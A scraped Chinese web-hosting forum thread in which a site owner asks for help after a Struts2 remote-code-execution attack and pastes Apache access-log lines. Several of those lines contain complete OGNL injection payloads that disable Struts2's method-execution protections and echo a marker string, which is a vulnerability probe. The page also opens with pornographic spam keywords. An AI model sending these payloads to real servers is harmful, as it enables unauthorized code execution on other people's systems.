四虎影视在线影院在线观看,小s货再浪些再咬紧点h,国产精品水嫩水嫩,97精产国品一二三产区

Board logo

標題: [求助] 我的站被struts2遠程代碼執(zhí)行漏洞簡要回顧 [打印本頁]
作者: flymeteor    時間: 2014-9-24 10:00     標題: 我的站被struts2遠程代碼執(zhí)行漏洞簡要回顧

我的站被這個搞了,截取一段日志,不是很懂,老大來看看,是 [tr][/tr]
當前版本: wdcp_v2.5.10(20140213) 最新
wdcp_v2.5.10(20140213)
更新日志


220.181.165.11 - - [23/Sep/2014:08:00:37 +0800] "GET /news/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 18573
220.181.165.11 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_mishouhuan/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9085
220.181.165.132 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_shengdian/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9094
220.181.165.134 - - [23/Sep/2014:08:00:38 +0800] "POST /news/ HTTP/1.1" 200 18573
220.181.165.4 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_ram/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 7861
222.85.129.139 - - [23/Sep/2014:08:00:38 +0800] "GET /shuaji/77925.html HTTP/1.1" 200 5816
223.104.13.16 - - [23/Sep/2014:08:00:36 +0800] "GET /uploads/image/20130916/20130916074137_94932.jpg HTTP/1.1" 200 53333
220.181.165.11 - - [23/Sep/2014:08:00:38 +0800] "POST /news/t_mishouhuan/ HTTP/1.1" 200 9085
220.181.165.135 - - [23/Sep/2014:08:00:38 +0800] "GET /new/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 301 841
220.181.165.9 - - [23/Sep/2014:08:00:38 +0800] "GET /softs/bixu/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9080
220.181.165.8 - - [23/Sep/2014:08:00:38 +0800] "POST /news/t_ram/ HTTP/1.1" 200 7861
218.81.235.186 - - [23/Sep/2014:08:00:38 +0800] "GET /js/grey.png HTTP/1.1" 200 3410
作者: yangjiangh    時間: 2014-9-24 18:44

我也不清楚 不知道有沒有交流論壇呢?



歡迎光臨 WDlinux官方論壇 (http://cd-genova.com/bbs/) Powered by Discuz! 7.2